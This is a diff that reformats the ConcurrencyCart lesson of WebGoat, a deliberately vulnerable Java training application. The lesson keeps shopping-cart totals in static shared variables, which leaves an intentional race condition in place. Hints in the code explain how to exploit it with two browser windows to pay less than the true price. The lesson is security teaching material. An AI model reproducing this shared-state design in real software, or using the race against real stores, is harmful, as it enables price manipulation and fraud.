+ * License, or (at your option) any later version.
  * 
- * This program is distributed in the hope that it will be useful, but WITHOUT
- * ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
- * FOR A PARTICULAR PURPOSE. See the GNU General Public License for more
- * details.
+ * This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without
+ * even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
+ * General Public License for more details.
  * 
- * You should have received a copy of the GNU General Public License along with
- * this program; if not, write to the Free Software Foundation, Inc., 59 Temple
- * Place - Suite 330, Boston, MA 02111-1307, USA.
+ * You should have received a copy of the GNU General Public License along with this program; if
+ * not, write to the Free Software Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA
+ * 02111-1307, USA.
  * 
  * Getting Source ==============
  * 
- * Source for this application is maintained at code.google.com, a repository
- * for free software projects.
+ * Source for this application is maintained at code.google.com, a repository for free software
+ * projects.
  * 
  * For details, please see http://code.google.com/p/webgoat/
- *
- * @author     Ryan Knell <a href="http://www.aspectsecurity.com">Aspect Security</a>
- * @created    July, 23 2007
+ * 
+ * @author Ryan Knell <a href="http://www.aspectsecurity.com">Aspect Security</a>
+ * @created July, 23 2007
  */
 
 public class ConcurrencyCart extends LessonAdapter
 {
-	//Shared Variables
+	// Shared Variables
 	private static int total = 0;
-    private static float runningTOTAL = 0;
-    private static int subTOTAL = 0;
-    private static float calcTOTAL = 0;
-    private static int quantity1 = 0;
-    private static int quantity2 = 0;
-    private static int quantity3 = 0;
-    private static int quantity4 = 0;
-    private float ratio = 0;
-    private int discount = 0;
-    
-	public final static A ASPECT_LOGO = new A().setHref("http://www.aspectsecurity.com").addElement(new IMG("images/logos/aspect.jpg").setAlt("Aspect Security").setBorder(0).setHspace(0).setVspace(0));
-	
-    /**
-     *  Description of the Method
-     *
-     * @param  s  Description of the Parameter
-     * @return    Description of the Return Value
-     */
-	
+	private static float runningTOTAL = 0;
+	private static int subTOTAL = 0;
+	private static float calcTOTAL = 0;
+	private static int quantity1 = 0;
+	private static int quantity2 = 0;
+	private static int quantity3 = 0;
+	private static int quantity4 = 0;
+	private float ratio = 0;
+	private int discount = 0;
+
+	public final static A ASPECT_LOGO = new A().setHref("http://www.aspectsecurity.com")
+			.addElement(
+						new IMG("images/logos/aspect.jpg").setAlt("Aspect Security").setBorder(0).setHspace(0)
+								.setVspace(0));
+
+	/**
+	 * Description of the Method
+	 * 
+	 * @param s
+	 *            Description of the Parameter
+	 * @return Description of the Return Value
+	 */
+
 	protected Element createContent(WebSession s)
-    {
-    	ElementContainer ec = null;
-    	  	   	
-    	try
-    	{
-    		String submit = s.getParser().getStringParameter("SUBMIT");
-    	    	   		  				
-	    		if("Purchase".equalsIgnoreCase(submit))
-	    		{
-	    			updateQuantity(s);
-	    			ec = createPurchaseContent(s, quantity1, quantity2, quantity3, quantity4);
-	    		}
-	    		else if ("Confirm".equalsIgnoreCase(submit))
-	    		{
-	    			ec = confirmation(s, quantity1, quantity2, quantity3, quantity4);
-	    			
-	    			//Discount
-	    			
-				if (calcTOTAL == 0) // No total cost for items
-				{
-				discount = 0; // Discount meaningless
-				}
-				else // The expected case -- items cost something
-				{
-					ratio = runningTOTAL / calcTOTAL;
-				}
-
-
-				if (calcTOTAL > runningTOTAL)
-	    		    {
-	    				//CONGRATS
-						discount = (int) (100 * (1 - ratio));
-						s.setMessage("Thank you for shopping! You have (illegally!) received a " + discount +"% discount. Police are on the way to your IP address.");
-	    			    	    			    
-	    		    	makeSuccess(s);
-	    		    }
-				else if (calcTOTAL < runningTOTAL)
-	    			{
-	    				//ALMOST
-					  discount = (int) (100 * (ratio - 1));
-					  s.setMessage("You are on the right track, but you actually overpaid by " + discount + "%. Try again!");
-	    			}
-	    		}
-	    		else
-	    		{
-	    			updateQuantity(s);
-	    			ec = createShoppingPage(s, quantity1, quantity2, quantity3, quantity4);
-	    		}
-	    			
-    	}
-    	catch (ParameterNotFoundException pnfe)
-    	{
-    		System.out.println("[DEBUG] no action selected, defaulting to createShoppingPage");
-    		ec = createShoppingPage(s, quantity1, quantity2, quantity3, quantity4);
-    	}
-    	
-    	return ec;
-    }
-	
-	//UPDATE QUANTITY VARIABLES
+	{
+		ElementContainer ec = null;
+
+		try
+		{
+			String submit = s.getParser().getStringParameter("SUBMIT");
+
+			if ("Purchase".equalsIgnoreCase(submit))
+			{
+				updateQuantity(s);
+				ec = createPurchaseContent(s, quantity1, quantity2, quantity3, quantity4);
+			}
+			else if ("Confirm".equalsIgnoreCase(submit))
+			{
+				ec = confirmation(s, quantity1, quantity2, quantity3, quantity4);
+
+				// Discount
+
+				if (calcTOTAL == 0) // No total cost for items
+				{
+					discount = 0; // Discount meaningless
+				}
+				else
+				// The expected case -- items cost something
+				{
+					ratio = runningTOTAL / calcTOTAL;
+				}
+
+				if (calcTOTAL > runningTOTAL)
+				{
+					// CONGRATS
+					discount = (int) (100 * (1 - ratio));
+					s.setMessage("Thank you for shopping! You have (illegally!) received a " + discount
+							+ "% discount. Police are on the way to your IP address.");
+
+					makeSuccess(s);
+				}
+				else if (calcTOTAL < runningTOTAL)
+				{
+					// ALMOST
+					discount = (int) (100 * (ratio - 1));
+					s.setMessage("You are on the right track, but you actually overpaid by " + discount
+							+ "%. Try again!");
+				}
+			}
+			else
+			{
+				updateQuantity(s);
+				ec = createShoppingPage(s, quantity1, quantity2, quantity3, quantity4);
+			}
+
+		} catch (ParameterNotFoundException pnfe)
+		{
+			System.out.println("[DEBUG] no action selected, defaulting to createShoppingPage");
+			ec = createShoppingPage(s, quantity1, quantity2, quantity3, quantity4);
+		}
+
+		return ec;
+	}
+
+	// UPDATE QUANTITY VARIABLES
 	private void updateQuantity(WebSession s)
 	{
-		quantity1 = thinkPositive(s.getParser().getIntParameter("QTY1", 0));
-		quantity2 = thinkPositive(s.getParser().getIntParameter("QTY2", 0));
-		quantity3 = thinkPositive(s.getParser().getIntParameter("QTY3", 0));
-		quantity4 = thinkPositive(s.getParser().getIntParameter("QTY4", 0));
+		quantity1 = thinkPositive(s.getParser().getIntParameter("QTY1", 0));
+		quantity2 = thinkPositive(s.getParser().getIntParameter("QTY2", 0));
+		quantity3 = thinkPositive(s.getParser().getIntParameter("QTY3", 0));
+		quantity4 = thinkPositive(s.getParser().getIntParameter("QTY4", 0));
 	}
-	
-    /*
-     **********************************************************************
-     ******************* PURCHASING PAGE **********************************
-     **********************************************************************
-     */
-	
-    private ElementContainer createPurchaseContent(WebSession s, int quantity1, int quantity2, int quantity3, int quantity4)
-    {
-    
-    	ElementContainer ec = new ElementContainer();
-    	runningTOTAL = 0;
-       	     
-   	String regex1 = "^[0-9]{3}$";// any three digits	
-	Pattern pattern1 = Pattern.compile(regex1);
-	
-	try
+
+	/*
+	 * ********************************************************************* ******************
+	 * PURCHASING PAGE **********************************
+	 * *********************************************************************
+	 */
+
+	private ElementContainer createPurchaseContent(WebSession s, int quantity1, int quantity2, int quantity3,
+			int quantity4)
 	{
-	    String param1 = s.getParser().getRawParameter("PAC", "111");
-	    String param2 = HtmlEncoder.encode(s.getParser().getRawParameter(
-		    "CC", "5321 1337 8888 2007"));
-	    
-	    // test input field1
-	    if (!pattern1.matcher(param1).matches())
-	    {
-		s.setMessage("Error! You entered " + HtmlEncoder.encode(param1) + " instead of your 3 digit code.  Please try again.");
-	    }
-	    	  
-	    ec.addElement(new HR().setWidth("90%"));
-	    ec.addElement(new Center().addElement(new H1().addElement("Place your order ")));
-	    Table table = new Table().setCellSpacing(0).setCellPadding(2)
-		    .setBorder(1).setWidth("90%").setAlign("center");
 
-	    if (s.isColor())  
-	       {  table.setBorder(1);  }
-        
-	    //Table Setup
-	    TR tr = new TR();
-	       tr.addElement(new TH().addElement("Shopping Cart Items").setWidth("80%"));
-	       tr.addElement(new TH().addElement("Price").setWidth("10%"));
-	       tr.addElement(new TH().addElement("Quantity").setWidth("3%"));
-	       tr.addElement(new TH().addElement("Subtotal").setWidth("7%"));
-	    table.addElement(tr);
-	    
-	    //Item 1
-	       tr = new TR();   //Create a new table object
-	       tr.addElement(new TD().addElement("Hitachi - 750GB External Hard Drive"));
-	       tr.addElement(new TD().addElement("$169.00").setAlign("right"));
-	       tr.addElement(new TD().addElement(String.valueOf(quantity1)).setAlign("center"));
-	        
-		    total = quantity1 * 169;
-		    runningTOTAL += total;
-		    tr.addElement(new TD().addElement("$" + formatInt(total) +".00"));
-		    table.addElement(tr);  //Adds table to the HTML
-	    
-	    //Item 2
-	       tr = new TR();
-	       tr.addElement(new TD().addElement("Hewlett-Packard - All-in-One Laser Printer"));
-	       tr.addElement(new TD().addElement("$299.00").setAlign("right"));
-	       tr.addElement(new TD().addElement(String.valueOf(quantity2)).setAlign("center"));
-	        
-		    total = quantity2 * 299;
-		    runningTOTAL += total;
-		    tr.addElement(new TD().addElement("$" + formatInt(total) +".00"));
-		    table.addElement(tr);
-	    
-	    //Item 3
- 	      tr = new TR();
-	      tr.addElement(new TD().addElement("Sony - Vaio with Intel Centrino"));
-	      tr.addElement(new TD().addElement("$1799.00").setAlign("right"));
-	      tr.addElement(new TD().addElement(String.valueOf(quantity3)).setAlign("center"));
-	    
-		    total = quantity3 * 1799;
-		    runningTOTAL += total;
-		    tr.addElement(new TD().addElement("$" + formatInt(total) +".00"));
-		    table.addElement(tr);
-	    
-	    //Item 4
-	      tr = new TR();
-	      tr.addElement(new TD().addElement("Toshiba - XGA LCD Projector "));
-	      tr.addElement(new TD().addElement("$649.00").setAlign("right"));
-	      tr.addElement(new TD().addElement(String.valueOf(quantity4)).setAlign("center"));
-	    
-		    total = quantity4 * 649;
-		    runningTOTAL += total;
-		    tr.addElement(new TD().addElement("$" + formatInt(total) +".00"));
-		    table.addElement(tr);
+		ElementContainer ec = new ElementContainer();
+		runningTOTAL = 0;
 
-	    ec.addElement(table);
+		String regex1 = "^[0-9]{3}$";// any three digits
+		Pattern pattern1 = Pattern.compile(regex1);
 
-	    table = new Table().setCellSpacing(0).setCellPadding(2).setBorder(0)
-		    .setWidth("90%").setAlign("center");
-
-	    if (s.isColor())   {  table.setBorder(1); }
-
-	    ec.addElement(new BR());
-
-	    calcTOTAL = runningTOTAL;
-	    
-	    //Total Charged
-		    tr = new TR();
-		    tr.addElement(new TD().addElement("Total:"));
-		    tr.addElement(new TD().addElement("$" + formatFloat(runningTOTAL)).setAlign("right"));
-		    table.addElement(tr);
-		    
-		    tr = new TR();
-		    tr.addElement(new TD().addElement("&nbsp;").setColSpan(2));
-		    table.addElement(tr);
-	    
-	    //Credit Card Input
-		    tr = new TR();
-		    tr.addElement(new TD().addElement("Enter your credit card number:"));
-		    tr.addElement(new TD().addElement(new Input(Input.TEXT, "CC", param2)).setAlign("right"));
-		    table.addElement(tr);
-	    
-	    //PAC Input
-		    tr = new TR();
-		    tr.addElement(new TD().addElement("Enter your three digit access code:"));
-		    tr.addElement(new TD().addElement(new Input(Input.TEXT, "PAC", param1)).setAlign("right"));
-		    table.addElement(tr);
-
-	    //Confirm Button
-		    Element b = ECSFactory.makeButton("Confirm");
-		    tr = new TR();
-		    tr.addElement(new TD().addElement(b).setColSpan(2).setAlign("right"));
-		    table.addElement(tr);
-	    
-	    //Cancel Button
-		    Element c = ECSFactory.makeButton("Cancel");
-		    tr = new TR();
-		    tr.addElement(new TD().addElement(c).setColSpan(2).setAlign("right"));
-		    table.addElement(tr);
-
-	    ec.addElement(table);
-	    ec.addElement(new BR());
-	    
-	}
-		catch (Exception e)
+		try
 		{
-		    s.setMessage("Error generating " + this.getClass().getName());
-		    e.printStackTrace();
-		}
-		
-	return (ec);
-    }
-    
-    /*
-     **********************************************************************
-     ******************* CONFIRMATION PAGE ********************************
-     **********************************************************************
-     */
-    
-    private ElementContainer confirmation (WebSession s, int quantity1, int quantity2, int quantity3, int quantity4)
-    {
-    	ElementContainer ec = new ElementContainer();
-    	
-    	final String confNumber = "CONC-88";
-	calcTOTAL = 0;
-    	try
-    	{
-	//Thread.sleep(5000);
-    	    
-    	ec.addElement(new HR().setWidth("90%"));
-	    ec.addElement(new Center().addElement(new H1().addElement("Thank you for your purchase!")));
-	    ec.addElement(new Center().addElement(new H1().addElement("Confirmation number: " + confNumber)));
-	    Table table = new Table().setCellSpacing(0).setCellPadding(2)
-		    .setBorder(1).setWidth("90%").setAlign("center");
+			String param1 = s.getParser().getRawParameter("PAC", "111");
+			String param2 = HtmlEncoder.encode(s.getParser().getRawParameter("CC", "5321 1337 8888 2007"));
 
-	    if (s.isColor())  
-	       {  table.setBorder(1);  }
-        
-	    //Table Setup
-		    TR tr = new TR();
-		    tr.addElement(new TH().addElement("Shopping Cart Items").setWidth("80%"));
-		    tr.addElement(new TH().addElement("Price").setWidth("10%"));
-		    tr.addElement(new TH().addElement("Quantity").setWidth("3%"));
-		    tr.addElement(new TH().addElement("Subtotal").setWidth("7%"));
-		    table.addElement(tr);
-	    
-	    //Item 1
-		    tr = new TR();   //Create a new table object
-		    tr.addElement(new TD().addElement("Hitachi - 750GB External Hard Drive"));
-		    tr.addElement(new TD().addElement("$169.00").setAlign("right"));
-		    tr.addElement(new TD().addElement(String.valueOf(quantity1)).setAlign("center"));
-	    
-		    total = quantity1 * 169;
-		    calcTOTAL += total;
-		    tr.addElement(new TD().addElement("$" + formatInt(total) +".00"));
-		    table.addElement(tr);  //Adds table to the HTML
-	    
-	    //Item 2
-		    tr = new TR();
-		    tr.addElement(new TD().addElement("Hewlett-Packard - All-in-One Laser Printer"));
-		    tr.addElement(new TD().addElement("$299.00").setAlign("right"));
-		    tr.addElement(new TD().addElement(String.valueOf(quantity2)).setAlign("center"));
-	      
-		    total = quantity2 * 299;
-		    calcTOTAL += total;
-		    tr.addElement(new TD().addElement("$" + formatInt(total) +".00"));
-		    table.addElement(tr);
-	    
-	    //Item 3
-		    tr = new TR();
-		    tr.addElement(new TD().addElement("Sony - Vaio with Intel Centrino"));
-		    tr.addElement(new TD().addElement("$1799.00").setAlign("right"));
-		    tr.addElement(new TD().addElement(String.valueOf(quantity3)).setAlign("center"));
-	      
-		    total = quantity3 * 1799;
-		    calcTOTAL += total;
-		    tr.addElement(new TD().addElement("$" + formatInt(total) +".00"));
-		    table.addElement(tr);
-	    
-	    //Item 4
-		    tr = new TR();
-		    tr.addElement(new TD().addElement("Toshiba - XGA LCD Projector "));
-		    tr.addElement(new TD().addElement("$649.00").setAlign("right"));
-		    tr.addElement(new TD().addElement(String.valueOf(quantity4)).setAlign("center"));
-	     
-		    total = quantity4 * 649;
-		    calcTOTAL += total;
-		    tr.addElement(new TD().addElement("$" + formatInt(total) +".00"));
-		    table.addElement(tr);
-
-	    ec.addElement(table);
-
-	    table = new Table().setCellSpacing(0).setCellPadding(2).setBorder(0)
-		    .setWidth("90%").setAlign("center");
-
-	    if (s.isColor())  
-	       {  table.setBorder(1); }
-
-	    ec.addElement(new BR());
-
-	    //Total Charged
-		    tr = new TR();
-		    tr.addElement(new TD().addElement("Total Amount Charged to Your Credit Card:"));
-		    tr.addElement(new TD().addElement("$" + formatFloat(runningTOTAL)).setAlign("right"));
-		    table.addElement(tr);
-	    
-	    tr = new TR();
-	    tr.addElement(new TD().addElement("&nbsp;").setColSpan(2));
-	    table.addElement(tr);
-	    
-	    //Return to Store Button
-		    Element b = ECSFactory.makeButton("Return to Store");
-		    tr = new TR();
-		    tr.addElement(new TD().addElement(b).setColSpan(2).setAlign("center"));
-		    table.addElement(tr);
-
-	    ec.addElement(table);
-	    ec.addElement(new BR());
-	   	    
-	}
-			catch (Exception e)
+			// test input field1
+			if (!pattern1.matcher(param1).matches())
 			{
-			    s.setMessage("Error generating " + this.getClass().getName());
-			    e.printStackTrace();
+				s.setMessage("Error! You entered " + HtmlEncoder.encode(param1)
+						+ " instead of your 3 digit code.  Please try again.");
 			}
-	return (ec);
-    }
-    
-    /*
-     **********************************************************************
-     ******************* SHOPPING PAGE **********************************
-     **********************************************************************
-     */
-    
-    private ElementContainer createShoppingPage(WebSession s, int quantity1, int quantity2, int quantity3, int quantity4)
-    {
-    	    	
-    ElementContainer ec = new ElementContainer();
-    subTOTAL = 0;
 
-	try
-	{
-	    
-	    ec.addElement(new HR().setWidth("90%"));
-	    ec.addElement(new Center().addElement(new H1().addElement("Shopping Cart ")));
-	    Table table = new Table().setCellSpacing(0).setCellPadding(2)
-		    .setBorder(1).setWidth("90%").setAlign("center");
+			ec.addElement(new HR().setWidth("90%"));
+			ec.addElement(new Center().addElement(new H1().addElement("Place your order ")));
+			Table table = new Table().setCellSpacing(0).setCellPadding(2).setBorder(1).setWidth("90%")
+					.setAlign("center");
 
-	    if (s.isColor())  
-	       {  table.setBorder(1);  }
-        
-	    //Table Setup
-		    TR tr = new TR();
-		    tr.addElement(new TH().addElement("Shopping Cart Items").setWidth("80%"));
-		    tr.addElement(new TH().addElement("Price").setWidth("10%"));
-		    tr.addElement(new TH().addElement("Quantity").setWidth("3%"));
-		    tr.addElement(new TH().addElement("Subtotal").setWidth("7%"));
-		    table.addElement(tr);
-	    
-	    //Item 1
-		    tr = new TR();   //Create a new table object
-		    tr.addElement(new TD().addElement("Hitachi - 750GB External Hard Drive"));
-		    tr.addElement(new TD().addElement("$169.00").setAlign("right"));
-		    tr.addElement(new TD().addElement(
-				new Input(Input.TEXT, "QTY1", String.valueOf(quantity1)))
-			    .setAlign("right"));
-		    
-		    total = quantity1 * 169;
-		    subTOTAL += total;
-		    tr.addElement(new TD().addElement("$" + formatInt(total) +".00"));
-		    table.addElement(tr);  //Adds table to the HTML
-	    
-	    //Item 2
-		    tr = new TR();
-		    tr.addElement(new TD().addElement("Hewlett-Packard - All-in-One Laser Printer"));
-		    tr.addElement(new TD().addElement("$299.00").setAlign("right"));
-		    tr.addElement(new TD().addElement(
-			    new Input(Input.TEXT, "QTY2", String.valueOf(quantity2)))
-			    .setAlign("right"));
-		    
-		    total = quantity2 * 299;
-		    subTOTAL += total;
-		    tr.addElement(new TD().addElement("$" + formatInt(total) +".00"));
-		    table.addElement(tr);
-	    
-	    //Item 3
-		    tr = new TR();
-		    tr.addElement(new TD().addElement("Sony - Vaio with Intel Centrino"));
-		    tr.addElement(new TD().addElement("$1799.00").setAlign("right"));
-		    tr.addElement(new TD().addElement(
-			    new Input(Input.TEXT, "QTY3", String.valueOf(quantity3)))
-			    .setAlign("right"));
-		    
-		    total = quantity3 * 1799;
-		    subTOTAL += total;
-		    tr.addElement(new TD().addElement("$" + formatInt(total) +".00"));
-		    table.addElement(tr);
-	    
-	    //Item 4
-		    tr = new TR();
-		    tr.addElement(new TD().addElement("Toshiba - XGA LCD Projector "));
-		    tr.addElement(new TD().addElement("$649.00").setAlign("right"));
-		    tr.addElement(new TD().addElement(
-			    new Input(Input.TEXT, "QTY4", String.valueOf(quantity4)))
-			    .setAlign("right"));
-		    
-		    total = quantity4 * 649;
-		    subTOTAL += total;
-		    tr.addElement(new TD().addElement("$" + formatInt(total) +".00"));
-		    table.addElement(tr);
+			if (s.isColor())
+			{
+				table.setBorder(1);
+			}
 
-	    ec.addElement(table);
+			// Table Setup
+			TR tr = new TR();
+			tr.addElement(new TH().addElement("Shopping Cart Items").setWidth("80%"));
+			tr.addElement(new TH().addElement("Price").setWidth("10%"));
+			tr.addElement(new TH().addElement("Quantity").setWidth("3%"));
+			tr.addElement(new TH().addElement("Subtotal").setWidth("7%"));
+			table.addElement(tr);
 
-	    table = new Table().setCellSpacing(0).setCellPadding(2).setBorder(0)
-		    .setWidth("90%").setAlign("center");
+			// Item 1
+			tr = new TR(); // Create a new table object
+			tr.addElement(new TD().addElement("Hitachi - 750GB External Hard Drive"));
+			tr.addElement(new TD().addElement("$169.00").setAlign("right"));
+			tr.addElement(new TD().addElement(String.valueOf(quantity1)).setAlign("center"));
 
-	    if (s.isColor())  
-	       {  table.setBorder(1); }
+			total = quantity1 * 169;
+			runningTOTAL += total;
+			tr.addElement(new TD().addElement("$" + formatInt(total) + ".00"));
+			table.addElement(tr); // Adds table to the HTML
 
-	    ec.addElement(new BR());
-	    
-	    //Purchasing Amount
-	    tr = new TR();
-	    tr.addElement(new TD().addElement("Total: " +"$" +formatInt(subTOTAL) +".00").setAlign("left"));
-	    table.addElement(tr);
+			// Item 2
+			tr = new TR();
+			tr.addElement(new TD().addElement("Hewlett-Packard - All-in-One Laser Printer"));
+			tr.addElement(new TD().addElement("$299.00").setAlign("right"));
+			tr.addElement(new TD().addElement(String.valueOf(quantity2)).setAlign("center"));
 
-	    //Update Button
-		    Element b = ECSFactory.makeButton("Update Cart");
-		    tr = new TR();
-		    tr.addElement(new TD().addElement(b).setColSpan(2).setAlign("right"));
-		    table.addElement(tr);
+			total = quantity2 * 299;
+			runningTOTAL += total;
+			tr.addElement(new TD().addElement("$" + formatInt(total) + ".00"));
+			table.addElement(tr);
 
-	    
-	    tr = new TR();
-	    tr.addElement(new TD().addElement("&nbsp;").setColSpan(2));
-	    table.addElement(tr);
-	    
-	    //Purchase Button
-		    Element c = ECSFactory.makeButton("Purchase");
-		    tr = new TR();
-		    tr.addElement(new TD().addElement(c).setColSpan(2).setAlign("right"));
-		    table.addElement(tr);
+			// Item 3
+			tr = new TR();
+			tr.addElement(new TD().addElement("Sony - Vaio with Intel Centrino"));
+			tr.addElement(new TD().addElement("$1799.00").setAlign("right"));
+			tr.addElement(new TD().addElement(String.valueOf(quantity3)).setAlign("center"));
 
-	    ec.addElement(table);
-	    ec.addElement(new BR());
-		    
+			total = quantity3 * 1799;
+			runningTOTAL += total;
+			tr.addElement(new TD().addElement("$" + formatInt(total) + ".00"));
+			table.addElement(tr);
+
+			// Item 4
+			tr = new TR();
+			tr.addElement(new TD().addElement("Toshiba - XGA LCD Projector "));
+			tr.addElement(new TD().addElement("$649.00").setAlign("right"));
+			tr.addElement(new TD().addElement(String.valueOf(quantity4)).setAlign("center"));
+
+			total = quantity4 * 649;
+			runningTOTAL += total;
+			tr.addElement(new TD().addElement("$" + formatInt(total) + ".00"));
+			table.addElement(tr);
+
+			ec.addElement(table);
+
+			table = new Table().setCellSpacing(0).setCellPadding(2).setBorder(0).setWidth("90%").setAlign("center");
+
+			if (s.isColor())
+			{
+				table.setBorder(1);
+			}
+
+			ec.addElement(new BR());
+
+			calcTOTAL = runningTOTAL;
+
+			// Total Charged
+			tr = new TR();
+			tr.addElement(new TD().addElement("Total:"));
+			tr.addElement(new TD().addElement("$" + formatFloat(runningTOTAL)).setAlign("right"));
+			table.addElement(tr);
+
+			tr = new TR();
+			tr.addElement(new TD().addElement("&nbsp;").setColSpan(2));
+			table.addElement(tr);
+
+			// Credit Card Input
+			tr = new TR();
+			tr.addElement(new TD().addElement("Enter your credit card number:"));
+			tr.addElement(new TD().addElement(new Input(Input.TEXT, "CC", param2)).setAlign("right"));
+			table.addElement(tr);
+
+			// PAC Input
+			tr = new TR();
+			tr.addElement(new TD().addElement("Enter your three digit access code:"));
+			tr.addElement(new TD().addElement(new Input(Input.TEXT, "PAC", param1)).setAlign("right"));
+			table.addElement(tr);
+
+			// Confirm Button
+			Element b = ECSFactory.makeButton("Confirm");
+			tr = new TR();
+			tr.addElement(new TD().addElement(b).setColSpan(2).setAlign("right"));
+			table.addElement(tr);
+
+			// Cancel Button
+			Element c = ECSFactory.makeButton("Cancel");
+			tr = new TR();
+			tr.addElement(new TD().addElement(c).setColSpan(2).setAlign("right"));
+			table.addElement(tr);
+
+			ec.addElement(table);
+			ec.addElement(new BR());
+
+		} catch (Exception e)
+		{
+			s.setMessage("Error generating " + this.getClass().getName());
+			e.printStackTrace();
+		}
+
+		return (ec);
 	}
-	catch (Exception e)
+
+	/*
+	 * ********************************************************************* ******************
+	 * CONFIRMATION PAGE ********************************
+	 * *********************************************************************
+	 */
+
+	private ElementContainer confirmation(WebSession s, int quantity1, int quantity2, int quantity3, int quantity4)
 	{
-	    s.setMessage("Error generating " + this.getClass().getName());
-	    e.printStackTrace();
+		ElementContainer ec = new ElementContainer();
+
+		final String confNumber = "CONC-88";
+		calcTOTAL = 0;
+		try
+		{
+			// Thread.sleep(5000);
+
+			ec.addElement(new HR().setWidth("90%"));
+			ec.addElement(new Center().addElement(new H1().addElement("Thank you for your purchase!")));
+			ec.addElement(new Center().addElement(new H1().addElement("Confirmation number: " + confNumber)));
+			Table table = new Table().setCellSpacing(0).setCellPadding(2).setBorder(1).setWidth("90%")
+					.setAlign("center");
+
+			if (s.isColor())
+			{
+				table.setBorder(1);
+			}
+
+			// Table Setup
+			TR tr = new TR();
+			tr.addElement(new TH().addElement("Shopping Cart Items").setWidth("80%"));
+			tr.addElement(new TH().addElement("Price").setWidth("10%"));
+			tr.addElement(new TH().addElement("Quantity").setWidth("3%"));
+			tr.addElement(new TH().addElement("Subtotal").setWidth("7%"));
+			table.addElement(tr);
+
+			// Item 1
+			tr = new TR(); // Create a new table object
+			tr.addElement(new TD().addElement("Hitachi - 750GB External Hard Drive"));
+			tr.addElement(new TD().addElement("$169.00").setAlign("right"));
+			tr.addElement(new TD().addElement(String.valueOf(quantity1)).setAlign("center"));
+
+			total = quantity1 * 169;
+			calcTOTAL += total;
+			tr.addElement(new TD().addElement("$" + formatInt(total) + ".00"));
+			table.addElement(tr); // Adds table to the HTML
+
+			// Item 2
+			tr = new TR();
+			tr.addElement(new TD().addElement("Hewlett-Packard - All-in-One Laser Printer"));
+			tr.addElement(new TD().addElement("$299.00").setAlign("right"));
+			tr.addElement(new TD().addElement(String.valueOf(quantity2)).setAlign("center"));
+
+			total = quantity2 * 299;
+			calcTOTAL += total;
+			tr.addElement(new TD().addElement("$" + formatInt(total) + ".00"));
+			table.addElement(tr);
+
+			// Item 3
+			tr = new TR();
+			tr.addElement(new TD().addElement("Sony - Vaio with Intel Centrino"));
+			tr.addElement(new TD().addElement("$1799.00").setAlign("right"));
+			tr.addElement(new TD().addElement(String.valueOf(quantity3)).setAlign("center"));
+
+			total = quantity3 * 1799;
+			calcTOTAL += total;
+			tr.addElement(new TD().addElement("$" + formatInt(total) + ".00"));
+			table.addElement(tr);
+
+			// Item 4
+			tr = new TR();
+			tr.addElement(new TD().addElement("Toshiba - XGA LCD Projector "));
+			tr.addElement(new TD().addElement("$649.00").setAlign("right"));
+			tr.addElement(new TD().addElement(String.valueOf(quantity4)).setAlign("center"));
+
+			total = quantity4 * 649;
+			calcTOTAL += total;
+			tr.addElement(new TD().addElement("$" + formatInt(total) + ".00"));
+			table.addElement(tr);
+
+			ec.addElement(table);
+
+			table = new Table().setCellSpacing(0).setCellPadding(2).setBorder(0).setWidth("90%").setAlign("center");
+
+			if (s.isColor())
+			{
+				table.setBorder(1);
+			}
+
+			ec.addElement(new BR());
+
+			// Total Charged
+			tr = new TR();
+			tr.addElement(new TD().addElement("Total Amount Charged to Your Credit Card:"));
+			tr.addElement(new TD().addElement("$" + formatFloat(runningTOTAL)).setAlign("right"));
+			table.addElement(tr);
+
+			tr = new TR();
+			tr.addElement(new TD().addElement("&nbsp;").setColSpan(2));
+			table.addElement(tr);
+
+			// Return to Store Button
+			Element b = ECSFactory.makeButton("Return to Store");
+			tr = new TR();
+			tr.addElement(new TD().addElement(b).setColSpan(2).setAlign("center"));
+			table.addElement(tr);
+
+			ec.addElement(table);
+			ec.addElement(new BR());
+
+		} catch (Exception e)
+		{
+			s.setMessage("Error generating " + this.getClass().getName());
+			e.printStackTrace();
+		}
+		return (ec);
 	}
-	return (ec);
-    }
 
-    String formatInt (int i)
-    {
-	NumberFormat intFormat =
-	      NumberFormat.getIntegerInstance(Locale.US);
-	return intFormat.format(i);
-    }
-
-    String formatFloat (float f)
-    {
-	NumberFormat floatFormat =
-	      NumberFormat.getNumberInstance(Locale.US);
-	floatFormat.setMinimumFractionDigits(2);
-	floatFormat.setMaximumFractionDigits(2);
-	return floatFormat.format(f);
-    }
-
-    int thinkPositive(int i)
-    {
-	if (i < 0 )
-		return 0 ;
-	else
-		return i ;
-    }
-
-    /**
-     *  DOCUMENT ME!
-     *
-     * @return    DOCUMENT ME!
-     */
-    protected Category getDefaultCategory()		{  return Category.CONCURRENCY;  }
-       
-    /**
-     *  Gets the hints attribute of the AccessControlScreen object
-     *
-     * @return    The hints value
-     */
-    protected List<String> getHints(WebSession s)
-    {
-	List<String> hints = new ArrayList<String>();
-	  hints.add("Can you purchase the merchandise in your shopping cart for a lower price?");
-	  hints.add("Try using a new browser window to get a lower price.");
-	  hints.add("In window A, purchase a low cost item, in window B a high cost item.");
-	  hints.add("In window A, commit after updating cart in window B.");
+	/*
+	 * ********************************************************************* ******************
+	 * SHOPPING PAGE **********************************
+	 * *********************************************************************
+	 */
 
-	return hints;
-    }
- 
-    /**
-     *  Gets the instructions attribute of the WeakAccessControl object
-     *
-     * @return    The instructions value
-     */
-    public String getInstructions(WebSession s)
-    {
-	String instructions = "For this exercise, your mission is to exploit the concurrency issue which will allow you to purchase merchandise for a lower price.";
-	return (instructions);
-    }
+	private ElementContainer createShoppingPage(WebSession s, int quantity1, int quantity2, int quantity3, int quantity4)
+	{
 
-    private final static Integer DEFAULT_RANKING = new Integer(120);
+		ElementContainer ec = new ElementContainer();
+		subTOTAL = 0;
 
-    protected Integer getDefaultRanking()	{  return DEFAULT_RANKING;  }
+		try
+		{
 
+			ec.addElement(new HR().setWidth("90%"));
+			ec.addElement(new Center().addElement(new H1().addElement("Shopping Cart ")));
+			Table table = new Table().setCellSpacing(0).setCellPadding(2).setBorder(1).setWidth("90%")
+					.setAlign("center");
 
-    /**
-     *  Gets the title attribute of the AccessControlScreen object
-     *
-     * @return    The title value
-     */
-    public String getTitle()		{  return "Shopping Cart Concurrency Flaw";  }
-    
-    public Element getCredits()		{  return super.getCustomCredits("", ASPECT_LOGO);  }
+			if (s.isColor())
+			{
+				table.setBorder(1);
+			}
+
